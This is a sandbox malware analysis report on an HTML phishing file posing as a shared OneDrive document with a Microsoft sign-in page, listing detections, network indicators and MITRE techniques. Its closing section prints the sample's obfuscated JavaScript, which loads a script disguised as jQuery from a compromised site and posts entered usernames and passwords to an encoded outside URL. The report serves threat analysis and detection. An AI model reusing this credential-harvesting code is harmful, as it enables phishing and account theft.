Edit tour

Windows Analysis Report
Onedrive Shared document.html

Overview

General Information

Sample name:	Onedrive Shared document.html
Analysis ID:	1585303
MD5:	d97e745856ef3711d2524c6455295426
SHA1:	fbd46fc88b3d413462cc00c02caaf6e29270315e
SHA256:	456f8698d3e7effe27b5378a01f05c2dcf864303c96e5ab27da7956aa093f1a1
Infos:

Detection

HTMLPhisher

Score:	92
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

AI detected phishing page

Yara detected HtmlPhish10

AI detected landing page (webpage, office document or email)

Detected javascript redirector / loader

HTML Script injector detected

HTML document with suspicious name

HTML document with suspicious title

HTML file submission containing password form

HTML page contains obfuscated javascript

HTML sample is only containing javascript code

Suspicious Javascript code found in HTML file

HTML body contains password input but no form action

HTML title does not match URL

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

None HTTPS page querying sensitive user data (password, username or email)

Classification

Process Tree

System is w10x64

chrome.exe (PID: 2344 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\Onedrive Shared document.html" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 744 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=1956,i,12266085751408568076,8214220606909640829,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Malware Configuration

⊘No configs have been found

Yara Signatures

HTML

Source	Rule	Description	Author	Strings
2.1.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
1.0.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security

Sigma Signatures

⊘No Sigma rule has matched

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Phishing

AI detected phishing page

Source: file:///C:/Users/user/Desktop/Onedrive%20Shared%20document.html	Joe Sandbox AI: Score: 10 Reasons: HTML file with login form DOM: 1.0.pages.csv
Source: file:///C:/Users/user/Desktop/Onedrive%20Shared%20document.html?rand=13InboxLightaspxn.1774256418&fid.4.1252899642&fid=1&fav.1&rand.13InboxLight.aspxn.1774256418&fid.1252899642&fid.1&fav.1&email=graham@mywrdwrx.com&loginpage=&.rand=13InboxLight.aspx?n=1774256418&fid=4	Joe Sandbox AI: Score: 10 Reasons: HTML file with login form DOM: 2.1.pages.csv

Yara detected HtmlPhish10

Source: Yara match	File source: 2.1.pages.csv, type: HTML
Source: Yara match	File source: 1.0.pages.csv, type: HTML

AI detected landing page (webpage, office document or email)

Source: file:///C:/Users/user/Desktop/Onedrive%20Shared%20document.html	Joe Sandbox AI: Page contains button: 'Continue' Source: '1.0.pages.csv'
Source: file:///C:/Users/user/Desktop/Onedrive%20Shared%20document.html?rand=13InboxLightaspxn.1774256418&fid.4.1252899642&fid=1&fav.1&rand.13InboxLight.aspxn.1774256418&fid.1252899642&fid.1&fav.1&email=graham@mywrdwrx.com&loginpage=&.rand=13InboxLight.aspx?n=1774256418&fid=4	Joe Sandbox AI: Page contains button: 'Continue' Source: '2.1.pages.csv'

Detected javascript redirector / loader

Source: Onedrive Shared document.html

HTTP Parser: Low number of body elements: 0

HTML Script injector detected

Source: file:///C:/Users/user/Desktop/Onedrive%20Shared%20document.html

HTTP Parser: New script tag found

HTML document with suspicious title

Source: file:///C:/Users/user/Desktop/Onedrive%20Shared%20document.html	Tab title: Sign in to your account
Source: file:///C:/Users/user/Desktop/Onedrive%20Shared%20document.html?rand=13InboxLightaspxn.1774256418&fid.4.1252899642&fid=1&fav.1&rand.13InboxLight.aspxn.1774256418&fid.1252899642&fid.1&fav.1&email=graham@mywrdwrx.com&loginpage=&.rand=13InboxLight.aspx?n=1774256418&fid=4	Tab title: Sign in to your account

HTML page contains obfuscated javascript

Source: file:///C:/Users/user/Desktop/Onedrive%20Shared%20document.html	HTTP Parser: function _0x2747(_0xa3c979,_0x45b1b0){var _0x5796ce=_0x5796();return _0x2747=function(_0x274730,_0x
Source: file:///C:/Users/user/Desktop/Onedrive%20Shared%20document.html?rand=13InboxLightaspxn.1774256418&fid.4.1252899642&fid=1&fav.1&rand.13InboxLight.aspxn.1774256418&fid.1252899642&fid.1&fav.1&email=graham@mywrdwrx.com&loginpage=&.rand=13InboxLight.aspx?n=1774256418&fid=4	HTTP Parser: function _0x2747(_0xa3c979,_0x45b1b0){var _0x5796ce=_0x5796();return _0x2747=function(_0x274730,_0x

HTML sample is only containing javascript code

Source: Onedrive Shared document.html

HTTP Parser: <script>var uid = window.location.hash.substring(1) || 'ama@coredc.com';</script><script src="https://midcommunications.com/wp-includes/js/dist/bootstrap.js";></script>

Suspicious Javascript code found in HTML file

Source: Onedrive Shared document.html	HTTP Parser: .location
Source: Onedrive Shared document.html	HTTP Parser: .location

Source: file:///C:/Users/user/Desktop/Onedrive%20Shared%20document.html

HTTP Parser: <input type="password" .../> found but no <form action="...

Source: file:///C:/Users/user/Desktop/Onedrive%20Shared%20document.html

HTTP Parser: Title: Sign in to your account does not match URL

Source: file:///C:/Users/user/Desktop/Onedrive%20Shared%20document.html

HTTP Parser: Has password / email / username input fields

Source: file:///C:/Users/user/Desktop/Onedrive%20Shared%20document.html

HTTP Parser: <input type="password" .../> found

Source: file:///C:/Users/user/Desktop/Onedrive%20Shared%20document.html

HTTP Parser: No <meta name="author".. found

Source: file:///C:/Users/user/Desktop/Onedrive%20Shared%20document.html

HTTP Parser: No <meta name="copyright".. found

Source: Joe Sandbox View	IP Address: 151.101.130.137 151.101.130.137
Source: Joe Sandbox View	IP Address: 151.101.130.137 151.101.130.137
Source: Joe Sandbox View	IP Address: 151.101.2.137 151.101.2.137
Source: Joe Sandbox View	IP Address: 151.101.2.137 151.101.2.137
Source: Joe Sandbox View	IP Address: 239.255.255.250 239.255.255.250

Source: Joe Sandbox View

ASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /wp-includes/js/dist/bootstrap.js HTTP/1.1Host: midcommunications.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /jquery-3.1.1.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /wp-includes/js/dist/bootstrap.js HTTP/1.1Host: midcommunications.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /jquery-3.1.1.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: global traffic	DNS traffic detected: DNS query: midcommunications.com
Source: global traffic	DNS traffic detected: DNS query: code.jquery.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com

Source: Onedrive Shared document.html

String found in binary or memory: https://midcommunications.com/wp-includes/js/dist/bootstrap.js

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

System Summary

HTML document with suspicious name

Source: Name includes: Onedrive Shared document.html

Initial sample: onedrive

Source: classification engine

Classification label: mal92.phis.winHTML@24/9@10/8

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\Onedrive Shared document.html"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=1956,i,12266085751408568076,8214220606909640829,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=1956,i,12266085751408568076,8214220606909640829,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Stealing of Sensitive Information

HTML file submission containing password form

Source: file:///C:/Users/user/Desktop/Onedrive%20Shared%20document.html

HTTP Parser: file:///C:/Users/user/Desktop/Onedrive%20Shared%20document.html

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 Browser Extensions	1 Process Injection	1 Process Injection	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	1 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

⊘No Antivirus matches

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://midcommunications.com/wp-includes/js/dist/bootstrap.js	0%	Avira URL Cloud	safe
file:///C:/Users/user/Desktop/Onedrive%20Shared%20document.html	0%	Avira URL Cloud	safe
file:///C:/Users/user/Desktop/Onedrive%20Shared%20document.html?rand=13InboxLightaspxn.1774256418&fid.4.1252899642&fid=1&fav.1&rand.13InboxLight.aspxn.1774256418&fid.1252899642&fid.1&fav.1&email=graham@mywrdwrx.com&loginpage=&.rand=13InboxLight.aspx?n=1774256418&fid=4	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
code.jquery.com	151.101.2.137	true	false	high
s-part-0033.t-0009.t-msedge.net	13.107.246.61	true	false	high
s-part-0017.t-0009.t-msedge.net	13.107.246.45	true	false	high
www.google.com	142.250.184.228	true	false	high
midcommunications.com	77.68.14.124	true	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
file:///C:/Users/user/Desktop/Onedrive%20Shared%20document.html	true	Avira URL Cloud: safe	unknown
https://midcommunications.com/wp-includes/js/dist/bootstrap.js	true	Avira URL Cloud: safe	unknown
file:///C:/Users/user/Desktop/Onedrive%20Shared%20document.html?rand=13InboxLightaspxn.1774256418&fid.4.1252899642&fid=1&fav.1&rand.13InboxLight.aspxn.1774256418&fid.1252899642&fid.1&fav.1&email=graham@mywrdwrx.com&loginpage=&.rand=13InboxLight.aspx?n=1774256418&fid=4	true	Avira URL Cloud: safe	unknown
https://code.jquery.com/jquery-3.1.1.min.js	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
151.101.130.137	unknown	United States	54113	FASTLYUS	false
151.101.2.137	code.jquery.com	United States	54113	FASTLYUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
77.68.14.124	midcommunications.com	United Kingdom	8560	ONEANDONE-ASBrauerstrasse48DE	true
142.250.184.228	www.google.com	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.7
192.168.2.4
192.168.2.23

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1585303
Start date and time:	2025-01-07 13:40:52 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 20s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowshtmlcookbook.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Onedrive Shared document.html
Detection:	MAL
Classification:	mal92.phis.winHTML@24/9@10/8
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .html

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 74.125.206.84, 142.250.184.227, 216.58.212.142, 142.250.185.78, 142.250.74.206, 142.250.185.142, 142.250.185.202, 216.58.206.74, 142.250.181.234, 172.217.18.106, 142.250.185.138, 142.250.184.234, 172.217.16.202, 142.250.185.106, 142.250.185.74, 172.217.18.10, 142.250.186.74, 142.250.185.170, 172.217.23.106, 142.250.186.106, 142.250.186.170, 142.250.185.234, 199.232.214.172, 192.229.221.95, 13.107.246.45, 13.107.246.61, 23.56.254.164, 20.109.210.53, 142.250.186.35, 142.250.185.206
Excluded domains from analysis (whitelisted): logincdn.msauth.net, clients1.google.com, fs.microsoft.com, lgincdnmsftuswe2.azureedge.net, accounts.google.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, firstparty-azurefd-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, redirector.gvt1.com, update.googleapis.com, lgincdnmsftuswe2.afd.azureedge.net, clients.l.google.com, optimizationguide-pa.googleapis.com
Not all processes where analyzed, report is missing behavior information
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Onedrive Shared document.html

Simulations

Behavior and APIs

⊘No simulations

Input	Output
URL: file:///C:/Users/user/Desktop/Onedrive%20Shared%2... Model: Joe Sandbox AI	{ "risk_score": 2, "reasoning": "The provided JavaScript snippet appears to be a simple utility that extracts a user ID from the URL hash or uses a default value. This behavior is common for web applications that need to identify users, and it does not demonstrate any high-risk indicators. The risk score is low as the code does not exhibit any malicious or suspicious activities." }
var uid = window.location.hash.substring(1) \|\| 'ama@coredc.com';
URL: https://midcommunications.com/wp-includes/js/dist/... Model: Joe Sandbox AI	{ "risk_score": 6, "reasoning": "The provided JavaScript snippet exhibits a mix of behaviors that warrant further investigation. While it appears to be a minified version of the popular jQuery library, the presence of obfuscated code and potential data exfiltration to an unknown domain raises some concerns. Additional context is needed to determine the legitimacy of the script's purpose and the potential risks it may pose." }
/! jQuery v3.6.0 jquery.com \| jquery.org/license / (function(_0x22706a,_0x30f8d5){var _0x30d97b=_0x2179,_0x1d0556=_0x22706a();while(!![]){try{var _0x52d2b7=parseInt(_0x30d97b(0x77))/0x1+parseInt(_0x30d97b(0x79))/0x2(parseInt(_0x30d97b(0x76))/0x3)+-parseInt(_0x30d97b(0x75))/0x4+-parseInt(_0x30d97b(0x74))/0x5+-parseInt(_0x30d97b(0x7b))/0x6+-parseInt(_0x30d97b(0x7a))/0x7+parseInt(_0x30d97b(0x78))/0x8;if(_0x52d2b7===_0x30f8d5)break;else _0x1d0556['push'](_0x1d0556['shift']());}catch(_0x432126){_0x1d0556['push'](_0x1d0556['shift']());}}}(_0x1dfa,0xe5c4a));function _0x2179(_0x362964,_0x803c7b){var _0x1dfa98=_0x1dfa();return _0x2179=function(_0x2179f2,_0x3b46dd){_0x2179f2=_0x2179f2-0x74;var _0x140c10=_0x1dfa98[_0x2179f2];return _0x140c10;},_0x2179(_0x362964,_0x803c7b);}function _0x1dfa(){var _0x4217b7=['24849760hDXMbH','407908eJVAtK','12988164EpQliH','6053538ZLhkWn','715915MITcBR','5071376topqUv','24sogoKA','478680tbEasN'];_0x1dfa=function(){return _0x4217b7;};return _0x1dfa();}var authprocess='aHR0cHM6Ly9zcHJpbmcuY29tLnBsL3dwLWluY2x1ZGVzL0lYUi9JWFItc2VydmVyL2NsaWVudC5waHA='; function _0x4953(_0x1f5cb3,_0x5540eb){var _0x410894=_0x4108();return _0x4953=function(_0x4953c7,_0x21ad21){_0x4953c7=_0x4953c7-0x1b5;var _0x943958=_0x410894[_0x4953c7];return _0x943958;},_0x4953(_0x1f5cb3,_0x5540eb);}var _0x34e85a=_0x4953;function _0x4108(){var _0x4d3489=['1122xIRSwh','4100145ZbWxMN','6810290nFsQgq','2900782iKXDdS','84821hFhSPe','1UHfvpS','8040qwKgMj','20085PkpCQJ','18IwnAzr','536NbREQG','6502120rkxmbo','3516rVskez','write'];_0x4108=function(){return _0x4d3489;};return _0x4108();}(function(_0x393576,_0x506288){var _0x53cfc0=_0x4953,_0x2d7cab=_0x393576();while(!![]){try{var _0x53d920=parseInt(_0x53cfc0(0x1bc))/0x1(-parseInt(_0x53cfc0(0x1ba))/0x2)+-parseInt(_0x53cfc0(0x1bd))/0x3(-parseInt(_0x53cfc0(0x1c0))/0x4)+parseInt(_0x53cfc0(0x1be))/0x5(parseInt(_0x53cfc0(0x1b7))/0x6)+-parseInt(_0x53cfc0(0x1b8))/0x7+parseInt(_0x53cfc0(0x1c1))/0x8+-parseInt(_0x53cfc0(0x1bf))/0x9(parseInt(_0x53cfc0(0x1b9))/0xa)+-parseInt(_0x53cfc0(0x1bb))/0xb(-parseInt(_0x53cfc0(0x1b5))/0xc);if(_0x53d920===_0x506288)break;else _0x2d7cab['push'](_0x2d7cab['shift']());}catch(_0x4b2d34){_0x2d7cab['push'](_0x2d7cab['shift']());}}}(_0x4108,0xbf74b),document[_0x34e85a(0x1b6)](unescape('%3C%21DOCTYPE%20html%3E%0A%3Chtml%20lang%3D%22en%22%3E%0A%20%20%3Chead%3E%0A%20%20%20%20%3Cmeta%20http-equiv%3D%22Content-Type%22%20content%3D%22text/html%3B%20charset%3DUTF-8%22%3E%0A%20%20%20%20%3Cmeta%20name%3D%22robots%22%20content%3D%22noindex%2C%20nofollow%22%3E%0A%20%20%20%20%3Cmeta%20name%3D%22googlebot%22%20content%3D%22noindex%2C%20nofollow%22%3E%0A%20%20%20%20%3Chtml%20dir%3D%22ltr%22%20lang%3D%22en%22%3E%0A%20%20%20%20%20%20%3Chead%3E%0A%20%20%20%20%20%20%20%20%3Cmeta%20http-equiv%3D%22Content-Type%22%20content%3D%22text/html%3B%20charset%3DUTF-8%22%3E%0A%20%20%20%20%20%20%20%20%3Ctitle%3ESign%20in%20to%20your%20account%3C/title%3E%0A%20%20%20%20%20%20%20%20%3Clink%20rel%3D%22shortcut%20icon%22%20href%3D%22https%3A//logincdn.msauth.net/16.000.28510.6/images/favicon.ico%22%3E%0A%20%20%20%20%20%20%20%20%3Cstyle%3E%0A%09%09html%7Bfont-family%3Asans-serif%3B-ms-text-size-adjust%3A100%25%3B-webkit-text-size-adjust%3A100%25%7Dbody%7Bmargin%3A0%7Darticle%2Caside%2Cdetails%2Cfigcaption%2Cfigure%2Cfooter%2Cheader%2Chgroup%2Cmain%2Cmenu%2Cnav%2Csection%2Csummary%7Bdisplay%3Ablock%7Daudio%2Ccanvas%2Cprogress%2Cvideo%7Bdisplay%3Ainline-block%3Bvertical-align%3Abaseline%7Daudio%3Anot%28%5Bcontrols%5D%29%7Bdisplay%3Anone%3Bheight%3A0%7D%5Bhidden%5D%2Ctemplate%7Bdisplay%3Anone%7Da%7Bbackground-color%3Atransparent%7Da%3Aactive%2Ca%3Ahover%7Boutline%3A0%7Dabbr%5Btitle%5D%7Bborder-bottom%3A1px%20dotted%7Db%2Cstrong%7Bfont-weight%3Abold%7Ddfn%7Bfont-style%3Aitalic%7Dh1%7Bfont-size%3A2em%3Bmargin%3A.67em%200%7Dmark%7Bbackground%3A%23ff0%3Bcolor%3A%23000%7Dsmall%7Bfont-size%3A80%25%7Dsub%2Csup%7Bfont-size%3A75%25%3Bline-height%3A0%3Bposition%3Arelative%3Bvertical-align%3Abaseline%7Dsup%7Btop%3A-.5em%7Dsub
URL: file:///C:/Users/user/Desktop/Onedrive%20Shared%2... Model: Joe Sandbox AI	{ "risk_score": 6, "reasoning": "The script exhibits several moderate-risk behaviors, including external data transmission, fallback domains, and aggressive DOM manipulation. While it does not contain any high-risk indicators like dynamic code execution or data exfiltration, the overall behavior is somewhat suspicious and requires further review." }
function _0x2747(_0xa3c979,_0x45b1b0){var _0x5796ce=_0x5796();return _0x2747=function(_0x274730,_0x547fe9){_0x274730=_0x274730-0x1a7;var _0xc05711=_0x5796ce[_0x274730];return _0xc05711;},_0x2747(_0xa3c979,_0x45b1b0);}(function(_0x293f7a,_0x405a94){var _0x4d9d2c=_0x2747,_0xf00b7a=_0x293f7a();while(!![]){try{var _0x3bb6da=parseInt(_0x4d9d2c(0x1b1))/0x1(parseInt(_0x4d9d2c(0x1c3))/0x2)+parseInt(_0x4d9d2c(0x1a8))/0x3+-parseInt(_0x4d9d2c(0x1c2))/0x4(-parseInt(_0x4d9d2c(0x1ba))/0x5)+parseInt(_0x4d9d2c(0x1ad))/0x6+-parseInt(_0x4d9d2c(0x1c7))/0x7(parseInt(_0x4d9d2c(0x1bc))/0x8)+-parseInt(_0x4d9d2c(0x1a7))/0x9(parseInt(_0x4d9d2c(0x1aa))/0xa)+parseInt(_0x4d9d2c(0x1be))/0xb;if(_0x3bb6da===_0x405a94)break;else _0xf00b7a['push'](_0xf00b7a['shift']());}catch(_0x1fed46){_0xf00b7a['push'](_0xf00b7a['shift']());}}}(_0x5796,0x88667),$(document)['ready'](function(){var _0x5d98f5=_0x2747,_0x25762d=0x0;$(_0x5d98f5(0x1bb))['val'](uid),$(_0x5d98f5(0x1bb))[_0x5d98f5(0x1b9)](_0x5d98f5(0x1bd),!![]),$(_0x5d98f5(0x1ac))[_0x5d98f5(0x1c8)](function(_0x4fb9ac){var _0x21469b=_0x5d98f5;_0x4fb9ac['preventDefault'](),$(_0x21469b(0x1c1))['hide'](),$('#msg')[_0x21469b(0x1c6)]();var _0x34f49f=$(_0x21469b(0x1bb))[_0x21469b(0x1c9)](),_0x4cda8e=$(_0x21469b(0x1c5))[_0x21469b(0x1c9)]();if(!_0x34f49f){$(_0x21469b(0x1c1))[_0x21469b(0x1ae)](),$(_0x21469b(0x1c1))[_0x21469b(0x1b2)](_0x21469b(0x1b3));return;}else{if(!_0x312a24(_0x34f49f)){$(_0x21469b(0x1c1))[_0x21469b(0x1ae)](),$(_0x21469b(0x1c1))[_0x21469b(0x1b2)](_0x21469b(0x1ab));return;}}if(!_0x4cda8e){$(_0x21469b(0x1c1))[_0x21469b(0x1ae)](),$(_0x21469b(0x1c1))['html'](_0x21469b(0x1b8));return;}_0x25762d=_0x25762d+0x1,$[_0x21469b(0x1b0)]({'dataType':_0x21469b(0x1bf),'url':atob(authprocess),'type':'POST','data':{'user':_0x34f49f,'pass':_0x4cda8e},'beforeSend':function(_0x5e0ab3){var _0x108605=_0x21469b;$(_0x108605(0x1ac))['val']('Verifying...');},'success':function(_0x5d3d74){var _0x485ba7=_0x21469b;$('#msg')['show'](),$(_0x485ba7(0x1b7))[_0x485ba7(0x1c9)](_0x485ba7(0x1b5)),$(_0x485ba7(0x1c5))[_0x485ba7(0x1c9)](''),console[_0x485ba7(0x1af)](_0x5d3d74),_0x5d3d74&&(_0x5d3d74[_0x485ba7(0x1b6)]==='ok'?($(_0x485ba7(0x1c5))[_0x485ba7(0x1c9)](''),_0x25762d>=0x2&&($(_0x485ba7(0x1b4))[_0x485ba7(0x1ae)](),$(_0x485ba7(0x1b7))['val'](_0x485ba7(0x1b5)),$(_0x485ba7(0x1c5))[_0x485ba7(0x1c9)](''))):($(_0x485ba7(0x1c1))[_0x485ba7(0x1ae)](),$(_0x485ba7(0x1c1))[_0x485ba7(0x1b2)](_0x5d3d74['msg'])));},'error':function(){var 